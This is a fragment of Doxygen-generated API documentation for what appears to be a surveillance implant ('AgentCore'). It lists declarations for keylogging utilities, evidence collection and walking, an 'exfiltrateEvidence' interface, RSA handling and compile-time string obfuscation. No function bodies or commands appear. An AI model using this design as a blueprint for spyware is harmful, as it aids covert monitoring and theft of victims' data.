<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gaaaf16ceaea6174d1762d3639f4fd72d9"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gaaaf16ceaea6174d1762d3639f4fd72d9">EVIDENCE_ADD</a></div><div class="ttdeci">#define EVIDENCE_ADD</div><div class="ttdoc">to call the evidence plugin to add an evidence</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00038">IEvidence.h:37</a></div></div>
<div class="ttc" id="aCModEvidence_8h_html"><div class="ttname"><a href="CModEvidence_8h.html">CModEvidence.h</a></div></div>
<div class="ttc" id="aCLog_8h_html_a2b5d27a6100113b1a09dce32f08b6f07"><div class="ttname"><a href="CLog_8h.html#a2b5d27a6100113b1a09dce32f08b6f07">DBGLOGI</a></div><div class="ttdeci">#define DBGLOGI(...)</div><div class="ttdoc">set to enable debug messages on release builds</div><div class="ttdef"><b>Definition:</b> <a href="CLog_8h_source.html#l00055">CLog.h:54</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CZLib_html_abcb096bb9867e846486c420b599c68e2"><div class="ttname"><a href="classBdUtils_1_1CZLib.html#abcb096bb9867e846486c420b599c68e2">BdUtils::CZLib::compress</a></div><div class="ttdeci">static int compress(uint8_t *in, size_t size, uint8_t **out, size_t *outSize, int level=Z_DEFAULT_COMPRESSION)</div><div class="ttdef"><b>Definition:</b> <a href="CZlib_8cpp_source.html#l00009">CZlib.cpp:9</a></div></div>
<div class="ttc" id="anamespaceAgentCore_html"><div class="ttname"><a href="namespaceAgentCore.html">AgentCore</a></div><div class="ttdef"><b>Definition:</b> <a href="CKeylogUtils_8h_source.html#l00012">CKeylogUtils.h:12</a></div></div>
<div class="ttc" id="aICore_8h_html"><div class="ttname"><a href="ICore_8h.html">ICore.h</a></div></div>
<div class="ttc" id="aobfuscate_8h_html_aeb960253580086e334d4f65300c10256"><div class="ttname"><a href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a></div><div class="ttdeci">#define vxENCRYPT(Str)</div><div class="ttdoc">compile-time encrypt string (release build only)</div><div class="ttdef"><b>Definition:</b> <a href="obfuscate_8h_source.html#l00097">obfuscate.h:96</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga3c492d604cde635c9079a36db4045da3"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga3c492d604cde635c9079a36db4045da3">AgentCore::IEvidence::exfiltrateEvidence</a></div><div class="ttdeci">virtual void exfiltrateEvidence(char *path, uint8_t *data, int size, bool spawn=false)=0</div></div>
<div class="ttc" id="aCMutex_8h_html_a945e98d6eab62f3906153938a8156e30"><div class="ttname"><a href="CMutex_8h.html#a945e98d6eab62f3906153938a8156e30">MUTEX_GUARD</a></div><div class="ttdeci">#define MUTEX_GUARD(m)</div><div class="ttdoc">mutex wrapper, wraps the inner mutex with std::lock_guard to provide RAII behaviour:  attempts to gra...</div><div class="ttdef"><b>Definition:</b> <a href="CMutex_8h_source.html#l00021">CMutex.h:20</a></div></div>
<div class="ttc" id="aCLog_8h_html_a989e37701588731748694b31a0b424db"><div class="ttname"><a href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a></div><div class="ttdeci">#define DBGLOGV(...)</div><div class="ttdoc">prints VERBOSE debug log</div><div class="ttdef"><b>Definition:</b> <a href="CLog_8h_source.html#l00067">CLog.h:66</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CFile_html_af2414b5d21096cbf5f1ba771b96a1d11"><div class="ttname"><a href="classBdUtils_1_1CFile.html#af2414b5d21096cbf5f1ba771b96a1d11">BdUtils::CFile::getFreeSpace</a></div><div class="ttdeci">static int getFreeSpace(const char *path, uint64_t *space)</div><div class="ttdef"><b>Definition:</b> <a href="CFile_8cpp_source.html#l00759">CFile.cpp:759</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CPluginBase_html"><div class="ttname"><a href="classAgentPluginPrivate_1_1CPluginBase.html">AgentPluginPrivate::CPluginBase</a></div><div class="ttdoc">base class for all plugins, implements AgentPlugin::IPlugin</div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8h_source.html#l00029">CPluginBase.h:29</a></div></div>
<div class="ttc" id="astructAgentCore_1_1__EvidenceStartParams_html"><div class="ttname"><a href="structAgentCore_1_1__EvidenceStartParams.html">AgentCore::_EvidenceStartParams</a></div><div class="ttdoc">evidence and exfiltrator plugins AgentPlugin::IPlugin::start() will be called with a pointer to this ...</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00023">IEvidence.h:23</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CMemory_html_a99f1d1b790b0547916dea7b12923932b"><div class="ttname"><a href="classBdUtils_1_1CMemory.html#a99f1d1b790b0547916dea7b12923932b">BdUtils::CMemory::realloc</a></div><div class="ttdeci">static void * realloc(void *ptr, size_t newSize)</div><div class="ttdef"><b>Definition:</b> <a href="CMemory_8cpp_source.html#l00021">CMemory.cpp:21</a></div></div>
<div class="ttc" id="aCModEvidence_8cpp_html_a071a1d7a19dc50db4408fa36938b3d9a"><div class="ttname"><a href="CModEvidence_8cpp.html#a071a1d7a19dc50db4408fa36938b3d9a">sizeWalkCallback</a></div><div class="ttdeci">static int sizeWalkCallback(const char *path, void *context, int depth, struct dirent *entry)</div><div class="ttdef"><b>Definition:</b> <a href="CModEvidence_8cpp_source.html#l00229">CModEvidence.cpp:229</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CModEvidence_html_a9c027b2ff8f1eef6ed86686638802cb6"><div class="ttname"><a href="classAgentPluginPrivate_1_1CModEvidence.html#a9c027b2ff8f1eef6ed86686638802cb6">AgentPluginPrivate::CModEvidence::_rsa</a></div><div class="ttdeci">BdUtils::CRSA * _rsa</div><div class="ttdef"><b>Definition:</b> <a href="CModEvidence_8h_source.html#l00084">CModEvidence.h:84</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga20360a0574745e71136d9fef2da48f93"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga20360a0574745e71136d9fef2da48f93">AgentCore::_EvidenceStartParams::in</a></div><div class="ttdeci">void * in</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00025">IEvidence.h:25</a></div></div>
<div class="ttc" id="aCModEvidence_8h_html_ab4843c13499ba363f0fe0f9a4dddaff0"><div class="ttname"><a href="CModEvidence_8h.html#ab4843c13499ba363f0fe0f9a4dddaff0">DEFAULT_STORAGE_MAX</a></div><div class="ttdeci">#define DEFAULT_STORAGE_MAX</div><div class="ttdoc">1000mb (1gb) default maximum storage quota</div><div class="ttdef"><b>Definition:</b> <a href="CModEvidence_8h_source.html#l00023">CModEvidence.h:22</a></div></div>
<div class="ttc" id="aCModEvidence_8cpp_html_a49b56d9416bb6da84f1ee61a93f5a53b"><div class="ttname"><a href="CModEvidence_8cpp.html#a49b56d9416bb6da84f1ee61a93f5a53b">evidenceWalkCallback</a></div><div class="ttdeci">static int evidenceWalkCallback(const char *path, void *context, int depth, struct dirent *entry)</div><div class="ttdef"><b>Definition:</b> <a href="CModEvidence_8cpp_source.html#l00082">CModEvidence.cpp:82</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gabf196e25206d836cd8e6cf3e8664ba94"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gabf196e25206d836cd8e6cf3e8664ba94">EVIDENCE_WALK</a></div><div class="ttdeci">#define EVIDENCE_WALK</div><div class="ttdoc">to call the evidence plugin to enumerate the collected evidences and call a callback for each</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00057">IEvidence.h:56</a></div></div>
<div class="ttc" id="anamespaceAgentPluginPrivate_html"><div class="ttname"><a href="namespaceAgentPluginPrivate.html">AgentPluginPrivate</a></div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8h_source.html#l00023">CPluginBase.h:23</a></div></div>
<div class="ttc" id="aCModEvidence_8cpp_html_a059b25eae0c9691ffc03478bef362549"><div class="ttname"><a href="CModEvidence_8cpp.html#a059b25eae0c9691ffc03478bef362549">instance</a></div><div class="ttdeci">IPlugin * instance()</div><div class="ttdef"><b>Definition:</b> <a href="CModEvidence_8cpp_source.html#l00021">CModEvidence.cpp:21</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga711f219c1a17aa2f9e18e994962d473e"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga711f219c1a17aa2f9e18e994962d473e">AgentCore::_EvidenceStartParams::outSize</a></div><div class="ttdeci">size_t outSize</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00031">IEvidence.h:31</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CString_html_add7f0bc7ecab7c304c22b50fed3064de"><div class="ttname"><a href="classBdUtils_1_1CString.html#add7f0bc7ecab7c304c22b50fed3064de">BdUtils::CString::randomString</a></div><div class="ttdeci">static int randomString(int rndBytes, char *str, int size)</div><div class="ttdef"><b>Definition:</b> <a href="CString_8cpp_source.html#l00489">CString.cpp:489</a></div></div>
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated by &#160;<a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.18
</small></address>
</body>
</html>
